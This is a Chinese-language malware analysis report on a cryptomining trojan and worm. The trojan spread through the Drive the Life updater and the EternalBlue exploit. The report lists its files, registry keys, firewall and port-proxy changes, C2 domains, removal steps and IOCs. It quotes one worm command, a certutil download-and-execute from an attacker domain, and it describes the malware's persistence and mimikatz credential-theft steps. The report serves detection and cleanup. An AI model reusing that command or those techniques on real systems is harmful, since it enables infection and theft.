1  病毒信息

病毒名稱：Trojan.Miner.gbq。
病毒類型：挖礦程序，后門，蠕蟲。
MD5： 59b18d6146a2aa066f661599c496090d。
SHA1： 48a3046381a963a2471875ef67886e35b90e8541。
文件類型：PE EXE。
文件大小：201,776 字節(jié)。
傳播途徑：通過驅(qū)動(dòng)人生的升級(jí)通道下發(fā)。
影響系統(tǒng)：安裝了受影響的驅(qū)動(dòng)人生程序的Windows系統(tǒng)，內(nèi)網(wǎng)中未打MS17-010系統(tǒng)補(bǔ)丁且開啟445端口的Windows系統(tǒng)。

2  病毒概況

2018年12月一款通過驅(qū)動(dòng)人生升級(jí)通道下發(fā)傳播的木馬爆發(fā)，該木馬同時(shí)利用了永恒之藍(lán)高危漏洞進(jìn)行傳播，僅2個(gè)小時(shí)受攻擊的用戶就高達(dá)10萬(wàn)，造成了嚴(yán)重的危害。
2019年1月24日，攻擊者通過云控指令對(duì)該木馬又進(jìn)行了新的更新，更新文件下載URL：http[:]//dl.haqo.net/updater.exe，MD5：59b18d6146a2aa066f661599c496090d，下載到本地保存的路徑為：C:\Windows\temp\updater.exe，該惡意代碼執(zhí)行后便會(huì)將自身移動(dòng)到系統(tǒng)關(guān)鍵目錄并釋放多個(gè)文件執(zhí)行，上傳主機(jī)的相關(guān)信息并從指定的惡意域名查詢指令，根據(jù)云端指令執(zhí)行惡意行為，當(dāng)前云端的指令僅僅是控制感染主機(jī)進(jìn)行挖礦操作，后續(xù)攻擊者可以根據(jù)需要改變?cè)贫酥噶睿瑥亩刂聘腥局鳈C(jī)執(zhí)行更加危險(xiǎn)的操作。

3  病毒危害

感染主機(jī)將接受惡意攻擊者下發(fā)的任意指令執(zhí)行惡意操作，當(dāng)前下發(fā)的指令是控制感染主機(jī)進(jìn)行挖礦操作，影響用戶的主機(jī)性能，同時(shí)下載永恒之藍(lán)利用工具實(shí)現(xiàn)內(nèi)網(wǎng)的感染操作，從而實(shí)現(xiàn)組建僵尸網(wǎng)絡(luò)的目的。

4  文件行為

1). 下載保存文件到c:\windows\temp\updater.exe，執(zhí)行后移動(dòng)到其他位置；
2). 移動(dòng)文件到c:\windows\system32\svhost.exe，并設(shè)置隱藏屬性；
3). 拷貝文件到c:\windows\system32\drivers\svchost.exe，并設(shè)置隱藏屬性；
4). 釋放文件到c:\windows\system32\drivers\taskmgr.exe，并設(shè)置隱藏屬性；
5). 釋放文件到c:\windows\system32\wmiex.exe，并設(shè)置隱藏屬性；
6). 下載文件到c:\windows\temp\svchost，此文件為永恒之藍(lán)漏洞利用工具；
7). 釋放文件到c:\windows\temp\m.ps1，此文件為mimikatz密碼hash提取工具；
8). 釋放文件到c:\windows\temp\mkatz.ini，此文件包含提取本機(jī)用戶的hash值；
注：在Windows64位系統(tǒng)中c:\windows\system32替換為c\windows\SysWOW64；

5  注冊(cè)表行為

1). 添加注冊(cè)表項(xiàng)：
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ddriver
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WebServers

6  網(wǎng)絡(luò)行為

1). 嘗試上傳主機(jī)信息到http[:]//i.haqo.net；
2). 嘗試上傳主機(jī)信息到http[:]//p.abbny.com；
3). 嘗試上傳主機(jī)信息到http[:]//o.beahh.com；
4). 嘗試上傳主機(jī)信息到http[:]//ii.haqo.net；
5). 嘗試上傳主機(jī)信息到http[:]//pp.abbny.com；
6). 嘗試上傳主機(jī)信息到http[:]//oo.beahh.com；
7). 嘗試獲取遠(yuǎn)控指令信息http[:]//i.haqo.net/i.png；
8). 嘗試獲取遠(yuǎn)控指令信息http[:]//p.abbny.com/im.png；
9). 嘗試獲取遠(yuǎn)控指令信息http[:]//o.beahh.com/i.png；
10). 嘗試獲取遠(yuǎn)控指令信息http[:]//ii.haqo.net/u.png；
11). 嘗試獲取遠(yuǎn)控指令信息http[:]//pp.abbny.com/u.png；
12). 嘗試獲取遠(yuǎn)控指令信息http[:]//oo.beahh.com/u.png；

7  手工清除方法

1). 刪除計(jì)劃任務(wù)，結(jié)束病毒進(jìn)程并刪除服務(wù)：
Ÿ 刪除名為Ddrivers和WebServers的計(jì)劃任務(wù)；
Ÿ 刪除名為DnsScan的計(jì)劃任務(wù)；
Ÿ 刪除名為\Microsoft\Windows\Bluetooths的計(jì)劃任務(wù)；
Ÿ 刪除可能存在的計(jì)劃任務(wù)Certificate；
Ÿ 刪除可能存在的計(jì)劃任務(wù)Credentials；
Ÿ 結(jié)束名為wmiex.exe進(jìn)程以及描述為“svchost”的svchost進(jìn)程；（注：通常正常的svchost進(jìn)程描述為“Windows服務(wù)主進(jìn)程”）；
Ÿ 刪除名為Ddriver和WebServers的服務(wù)項(xiàng)；
2). 刪除下載和釋放的病毒文件，路徑如下：
Ÿ c:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.bat(注:[Username]替換為當(dāng)前登錄的用戶名)；
Ÿ c:\Users\[Username]\AppData\Roaming\Microsoft\cred.ps1(注:[Username]替換為當(dāng)前登錄的用戶名)；
Ÿ c:\programdata\microsoft\cred.ps1；
Ÿ c:\windows\temp\updater.exe；
Ÿ c:\windows\system32\svhost.exe；
Ÿ c:\windows\system32\drivers\svchost.exe；
Ÿ c:\windows\system32\drivers\taskmgr.exe；
Ÿ c:\windows\system32\wmiex.exe；
Ÿ c:\windows\temp\svchost；
Ÿ c:\windows\temp\m.ps1；
Ÿ c:\windows\temp\mkatz.ini；
3). 刪除病毒創(chuàng)建的注冊(cè)表項(xiàng)：
Ÿ HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ddriver
Ÿ HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WebServers
4). 刪除病毒設(shè)置的防火墻欄目：
Ÿ 刪除入站規(guī)則名為UDP，開放65532端口的規(guī)則；
Ÿ 刪除入站規(guī)則名為UDP2，開放65531端口的規(guī)則；
Ÿ 刪除入站規(guī)則名為ShareService，開放65533端口的規(guī)則；
5). 刪除病毒設(shè)置的端口轉(zhuǎn)發(fā)的設(shè)置
CMD管理員執(zhí)行如下命令：
Ÿ netsh interface portproxy delete v4tov4 listenport=65531
Ÿ netsh interface portproxy delete v4tov4 listenport=65532

8  應(yīng)對(duì)措施及建議

1). 卸載老版本的驅(qū)動(dòng)人生程序或者更新至最新版防止攻擊者下發(fā)新的惡意代碼；
2). 內(nèi)網(wǎng)使用共享的主機(jī)打上MS17-010漏洞補(bǔ)丁(補(bǔ)丁編號(hào)為KB4012212和KB4012215)，防止利用此漏洞的橫向攻擊；
3). 內(nèi)網(wǎng)使用共享的主機(jī)還需要打上KB2871997漏洞補(bǔ)丁，防止利用此漏洞的橫向攻擊；
4). 安裝好防病毒軟件并及時(shí)更新病毒庫(kù)以抵抗最新惡意代碼的攻擊；

9  詳細(xì)分析報(bào)告

1). 主程序啟動(dòng)后首先嘗試啟動(dòng)名為Ddriver的服務(wù)進(jìn)程，如果主機(jī)已經(jīng)被感染則直接執(zhí)行服務(wù)函數(shù)進(jìn)行挖礦等惡意行為，如果主機(jī)是初次被感染則執(zhí)行感染配置行為。

 
圖1 主函數(shù)入口

2). 第一步檢查自身名稱是否為svhost或者svchost.exe，如果程序名稱不為svhost或者svchost.exe則從資源節(jié)中解密釋放PE文件，釋放文件的hash： a4b7940b3d6b03269194f728610784d6，最終在磁盤中釋放路徑為C:\windows\temp\ttt.exe，釋放完成后便執(zhí)行該文件。

 
圖2 釋放主程序中102號(hào)資源文件

 
圖3 加密狀態(tài)的102號(hào)資源文件

3). 釋放執(zhí)行ttt.exe文件后便多次使用cmd命令清理系統(tǒng)原來(lái)感染的老版本的挖礦程序，為新版挖礦程序的安裝和運(yùn)行清理環(huán)境。

 
圖4 結(jié)束刪除老版的挖礦程序

4). 設(shè)置Windows防火墻開啟65531，65532，65533端口，在防火墻規(guī)則中分別命名為UDP2，UDP，ShareService，同時(shí)開啟端口轉(zhuǎn)發(fā)，將來(lái)自65532端口的流量轉(zhuǎn)發(fā)到1.1.1.1地址的53端口，將來(lái)自65531端口的流量轉(zhuǎn)發(fā)到1.1.1.1地址的53端口。

 
圖5 設(shè)置防火墻并設(shè)置端口代理

 
圖6 Windows防火墻中的增項(xiàng)

 
圖7 端口代理

5). 拷貝主程序到C:\windows\system32\svhost.exe并設(shè)置隱藏屬性，同時(shí)拷貝一份到C:\windows\system32\drivers\svchost.exe，之后設(shè)置計(jì)劃任務(wù)同時(shí)設(shè)置注冊(cè)表項(xiàng)，實(shí)現(xiàn)程序的開機(jī)啟動(dòng)和定期觸發(fā)執(zhí)行。

 
圖8 拷貝主程序文件到系統(tǒng)關(guān)鍵目錄下

 
圖9 設(shè)置計(jì)劃任務(wù)和注冊(cè)表項(xiàng)

6). 完成上述配置后嘗試使用CreateServiceA函數(shù)將C:\windows\system32\drivers\svchost.exe注冊(cè)為服務(wù)，如果服務(wù)存在則修改服務(wù)配置，如果CreateServiceA函數(shù)調(diào)用失敗則使用CMD方式調(diào)用sc create創(chuàng)建服務(wù)，最終嘗試使用net start和StartServiceA函數(shù)的方式啟動(dòng)服務(wù)函數(shù)。

 
圖10 創(chuàng)建Ddriver服務(wù)的首選方式

 
圖11 創(chuàng)建Ddriver服務(wù)的備用方式

 
圖12 啟動(dòng)創(chuàng)建的Ddriver服務(wù)

7). 服務(wù)主函數(shù)中首先根據(jù)系統(tǒng)位數(shù)拼接后續(xù)將要使用到的字符串資源，包括從而已域名臨時(shí)下載的文件以及解密之后的文件，和后續(xù)用來(lái)偽裝成任務(wù)管理器共享進(jìn)程進(jìn)行挖礦操作taskmgr.exe。

 
圖13 拼接后續(xù)需要使用的字符串

8). 創(chuàng)建名為“it is holy shit”的互斥體防止進(jìn)程重復(fù)啟動(dòng)運(yùn)行，根據(jù)系統(tǒng)位數(shù)解密釋放對(duì)應(yīng)的資源文件，64位系統(tǒng)解密釋放100號(hào)資源，32位系統(tǒng)解密釋放標(biāo)號(hào)為101號(hào)資源，釋放路徑為C:\Windows\system32\drivers\taskmgr.exe(64位系統(tǒng)：C:\Windows\SysWOW64\drivers\taskmgr.exe)。

 
圖14 利用互斥體防止進(jìn)程重復(fù)啟動(dòng)

 
圖15 根據(jù)系統(tǒng)位數(shù)釋放taskmgr.exe文件

9). 之后創(chuàng)建四個(gè)線程分別進(jìn)行相關(guān)的惡意操作，第一個(gè)線程根據(jù)主機(jī)中的進(jìn)程和主機(jī)系統(tǒng)相關(guān)參數(shù)調(diào)整挖礦程序的運(yùn)行狀態(tài)，當(dāng)用戶打開任務(wù)管理器瀏覽時(shí)會(huì)自動(dòng)關(guān)閉偽裝程序taskmgr.exe，使其不被用戶發(fā)現(xiàn)；第二個(gè)線程每隔10s嘗試啟動(dòng)C:\Windows\temp\svchost.exe(永恒之藍(lán)漏洞攻擊文件)，實(shí)現(xiàn)內(nèi)網(wǎng)的橫向感染傳播；第三個(gè)線程使用Wmic命令，每10秒對(duì)進(jìn)程進(jìn)行一次檢查，觸發(fā)時(shí)將結(jié)束挖礦進(jìn)程；第四個(gè)線程打開監(jiān)聽65533端口。

 
圖16 創(chuàng)建四個(gè)線程進(jìn)行操作

 
圖17 根據(jù)主機(jī)進(jìn)程決定是否暫時(shí)關(guān)閉偽裝進(jìn)程

 
圖18 每隔10秒嘗試啟動(dòng)永恒之藍(lán)漏洞攻擊文件

 
圖19 每隔10秒使用WMIC檢查進(jìn)程并決定是否關(guān)閉挖礦程序

 
圖20 開啟監(jiān)聽65533端口

10). 收集主機(jī)信息并發(fā)送到遠(yuǎn)程服務(wù)器，收集的信息包括主機(jī)ID，GUID，MAC地址，用戶名，系統(tǒng)版本，系統(tǒng)位數(shù)，CPU型號(hào)，安裝的反病毒軟件等等，最終在下載下一步指令的同時(shí)將上述信息傳輸?shù)竭h(yuǎn)程服務(wù)器。

 
圖21 收集發(fā)送到遠(yuǎn)程服務(wù)器的主機(jī)信息

11). 之后嘗試訪問遠(yuǎn)程服務(wù)器中指定的文件內(nèi)容，從而獲取執(zhí)行指令，在本地解密后解析執(zhí)行指令，發(fā)送的指令通過RC4+RSA算法進(jìn)行加密，本地獲取指令后通過硬編碼的RSA公鑰進(jìn)行解密，最終解析執(zhí)行遠(yuǎn)程命令。

 
圖22 當(dāng)前下發(fā)的指令密文
 
圖23 密文用于解密網(wǎng)址及資源路徑并使用RSA算法驗(yàn)證指令合法性

12). 由接受到的*.png中的指令內(nèi)容下載指定的文件執(zhí)行，當(dāng)前指令的意圖是從惡意域名http[:]//dl.haqo.net/下載i.exez資源，該資源為加密狀態(tài)，下載到本地后解密執(zhí)行，最終下載解密到C:\windows\temp\svchost.exe，目前下載的程序?yàn)橛篮阒{(lán)漏洞利用程序，該程序利用445端口實(shí)現(xiàn)了病毒的內(nèi)網(wǎng)橫向傳播操作，該利用工具中還增加了PASS-THE-HASH的模塊，嘗試?yán)脙?nèi)網(wǎng)弱口令進(jìn)行遠(yuǎn)程拷貝執(zhí)行感染操作。

 
圖24 下載指定文件解密執(zhí)行

13). 釋放的ttt.exe文件執(zhí)行之后會(huì)將自身移動(dòng)到C:\Windows\System32\wmiex.exe(64位系統(tǒng)：C:\Windows\SysWOW64\wmiex.exe)并設(shè)置了隱藏屬性，將自身寫入計(jì)劃任務(wù)，任務(wù)名為WebServers，每隔50分鐘執(zhí)行一次C:\Windows\system32\wmiex.exe(64位系統(tǒng)：C:\Windows\SysWOW64\wmiex.exe)，并創(chuàng)建服務(wù)WebServers設(shè)置為開機(jī)自啟動(dòng)。

 
圖25 釋放的ttt.exe文件被移動(dòng)到指定路徑

 
圖26 設(shè)置計(jì)劃任務(wù)項(xiàng)使其定期觸發(fā)

 
圖27 創(chuàng)建服務(wù)使其每次開機(jī)能夠自啟動(dòng)

 
圖28 釋放文件實(shí)現(xiàn)上述功能采用的命令行

14). WebServers服務(wù)啟動(dòng)后會(huì)向指定的三個(gè)域名發(fā)起Get請(qǐng)求將獲取的主機(jī)相關(guān)信息發(fā)送到遠(yuǎn)程服務(wù)器，從而收集主機(jī)的相關(guān)信息，其中包含主機(jī)名，標(biāo)識(shí)主機(jī)的GUID，主機(jī)MAC地址，主機(jī)系統(tǒng)和操作系統(tǒng)位數(shù)，其中pp.abbny.com和oo.beahh.com域名解析請(qǐng)求失敗，ii.haqo.net解析IP為172.104.73.9（IP地址顯示歸屬地為日本）。

 
圖29 上傳信息所到的惡意域名

 
圖30 上傳信息主機(jī)信息

15). WebServers服務(wù)同時(shí)具備Ddriver服務(wù)的聯(lián)網(wǎng)功能，通過嘗試下載指定域名的u.png文件，圖片文件中包含了加密的指令內(nèi)容，攻擊者可以通過編輯該文件從而控制感染主機(jī)進(jìn)行任意操作，也可以修改指令改變所下發(fā)的指令內(nèi)容，當(dāng)前該文件并不存在，因此WebServers不會(huì)執(zhí)行其他惡意行為，僅僅處于等待指令的狀態(tài)，在每次開機(jī)以及開機(jī)狀態(tài)后每隔50分鐘檢查接收一次遠(yuǎn)程指令，wmiex.exe中的代碼和svchost主程序中網(wǎng)絡(luò)相關(guān)的代碼基本一致，RSA公鑰也是一樣的，因此在這里算是攻擊者的一個(gè)重復(fù)性操作。

 
圖31 wmiex.exe和svchost.exe硬編碼的公鑰信息

16). 內(nèi)網(wǎng)利用漏洞進(jìn)行傳播，漏洞利用成功后遠(yuǎn)程執(zhí)行命令:certutil -urlcache -split -f http[:]//dl.haqo.net/dll.exe c:/installs.exe，使受害主機(jī)主動(dòng)到攻擊者設(shè)置好的網(wǎng)站下載執(zhí)行惡意代碼，實(shí)現(xiàn)蠕蟲式傳播。

 
圖32 漏洞利用工具包
 
 

10  樣本溯源分析

 

11  附錄(IOCs) 

a) HASH

bdbfa96d17c2f06f68b3bcc84568cf445915e194f130b0dc2411805cf889b6cc
b771267551961ce840a1fbcd65e8f5ecd0a21350387f35bbcd4c24125ec04530
01b842cab76c78a1d9860ade258923772fe3b08ae7a428d5f54e1bf9d9c3b205
735d9699b69b3ae2d27cbf452d488e1d1adbe643c8228e7093d012bf7fcff6de
57e4c156750f2ad1de1e22a5dd749a8dc4fedf88132c0ad6cb3506a838664dca

b) C&C

i.haqo.net
ii.haqo.net
dl.haqo.net
o.beahh.com
oo.beahh.com
p.abbny.com
pp.abbny.com
172.104.73.9(日本)
68.183.178.71(美國(guó))
139.162.107.97(日本)
153.92.4.49(美國(guó))
120.52.51.13(中國(guó)河北省廊坊市)